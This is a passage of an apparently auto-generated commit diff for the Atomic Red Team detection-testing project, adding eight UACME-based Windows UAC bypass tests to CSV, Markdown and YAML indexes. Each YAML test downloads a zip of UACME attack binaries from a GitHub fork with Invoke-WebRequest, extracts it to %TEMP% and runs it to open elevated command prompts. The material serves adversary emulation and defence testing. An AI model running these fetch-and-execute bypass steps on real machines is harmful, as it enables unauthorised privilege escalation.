Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -152,6 +152,14 @@ privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocki
 privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -257,6 +265,14 @@ defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Tr
 defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -100,6 +100,14 @@ privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocki
 privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -169,6 +177,14 @@ defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Tr
 defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -261,6 +261,14 @@
   - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
   - Atomic Test #8: Disable UAC using reg.exe [windows]
   - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+  - Atomic Test #10: UACME Bypass Method 23 [windows]
+  - Atomic Test #11: UACME Bypass Method 31 [windows]
+  - Atomic Test #12: UACME Bypass Method 33 [windows]
+  - Atomic Test #13: UACME Bypass Method 34 [windows]
+  - Atomic Test #14: UACME Bypass Method 39 [windows]
+  - Atomic Test #15: UACME Bypass Method 56 [windows]
+  - Atomic Test #16: UACME Bypass Method 59 [windows]
+  - Atomic Test #17: UACME Bypass Method 61 [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -459,6 +467,14 @@
   - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
   - Atomic Test #8: Disable UAC using reg.exe [windows]
   - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+  - Atomic Test #10: UACME Bypass Method 23 [windows]
+  - Atomic Test #11: UACME Bypass Method 31 [windows]
+  - Atomic Test #12: UACME Bypass Method 33 [windows]
+  - Atomic Test #13: UACME Bypass Method 34 [windows]
+  - Atomic Test #14: UACME Bypass Method 39 [windows]
+  - Atomic Test #15: UACME Bypass Method 56 [windows]
+  - Atomic Test #16: UACME Bypass Method 59 [windows]
+  - Atomic Test #17: UACME Bypass Method 61 [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -193,6 +193,14 @@
   - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
   - Atomic Test #8: Disable UAC using reg.exe [windows]
   - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+  - Atomic Test #10: UACME Bypass Method 23 [windows]
+  - Atomic Test #11: UACME Bypass Method 31 [windows]
+  - Atomic Test #12: UACME Bypass Method 33 [windows]
+  - Atomic Test #13: UACME Bypass Method 34 [windows]
+  - Atomic Test #14: UACME Bypass Method 39 [windows]
+  - Atomic Test #15: UACME Bypass Method 56 [windows]
+  - Atomic Test #16: UACME Bypass Method 59 [windows]
+  - Atomic Test #17: UACME Bypass Method 61 [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -326,6 +334,14 @@
   - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
   - Atomic Test #8: Disable UAC using reg.exe [windows]
   - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+  - Atomic Test #10: UACME Bypass Method 23 [windows]
+  - Atomic Test #11: UACME Bypass Method 31 [windows]
+  - Atomic Test #12: UACME Bypass Method 33 [windows]
+  - Atomic Test #13: UACME Bypass Method 34 [windows]
+  - Atomic Test #14: UACME Bypass Method 39 [windows]
+  - Atomic Test #15: UACME Bypass Method 56 [windows]
+  - Atomic Test #16: UACME Bypass Method 59 [windows]
+  - Atomic Test #17: UACME Bypass Method 61 [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]

atomics/Indexes/index.yaml

@@ -11348,6 +11348,290 @@ privilege-escalation:
         command: "#{file_path}\n"
         name: command_prompt
         elevation_required: false
+    - name: UACME Bypass Method 23
+      auto_generated_guid: 8ceab7a2-563a-47d2-b5ba-0995211128d7
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent:
+        DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\23 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 31
+      auto_generated_guid: b0f76240-9f33-4d34-90e8-3a7d501beb15
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent:
+        Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM
+        Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\31 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 33
+      auto_generated_guid: e514bb03-f71c-4b22-9092-9f961ec6fb03
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\33 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 34
+      auto_generated_guid: 695b2dac-423e-448e-b6ef-5b88e93011d6
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe
+        via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM
+        Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\34 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 39
+      auto_generated_guid: 56163687-081f-47da-bb9c-7b231c5585cf
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\39 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 56
+      auto_generated_guid: 235ec031-cd2d-465d-a7ae-68bab281e80e
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\56 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 59
+      auto_generated_guid: dfb1b667-4bb8-4a63-a85e-29936ea75f29
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and
+        DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM
+        Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\59 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 61
+      auto_generated_guid: 7825b576-744c-4555-856d-caf3460dc236
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod:
+        Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\61 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
   T1574.012:
     technique:
       external_references:
@@ -20765,6 +21049,290 @@ defense-evasion:
         command: "#{file_path}\n"
         name: command_prompt
         elevation_required: false
+    - name: UACME Bypass Method 23
+      auto_generated_guid: 8ceab7a2-563a-47d2-b5ba-0995211128d7
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent:
+        DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\23 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 31
+      auto_generated_guid: b0f76240-9f33-4d34-90e8-3a7d501beb15
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent:
+        Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM
+        Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\31 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
+        command: '"#{uacme_exe}"
+
+'
+        cleanup_command: |
+          powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+          powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+        name: command_prompt
+    - name: UACME Bypass Method 33
+      auto_generated_guid: e514bb03-f71c-4b22-9092-9f961ec6fb03
+      description: "Executes User Account Control Bypass according to the methods
+        listed below. Upon successful execution you should see event viewer load and
+        two administrative command prompts.\nNote: The cleanup_command's which kill
+        the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+        winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker
+        defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        uacme_exe:
+          description: Path to uacme executable
+          type: Path
+          default: "%temp%\\uacme\\33 Akagi64.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+        prereq_command: |
+          $tempPath = cmd /c echo #{uacme_exe}
+          if (Test-Path "$tempPath") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+          Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+          Remove-Item $env:TEMP\uacme.zip -Force
+      executor:
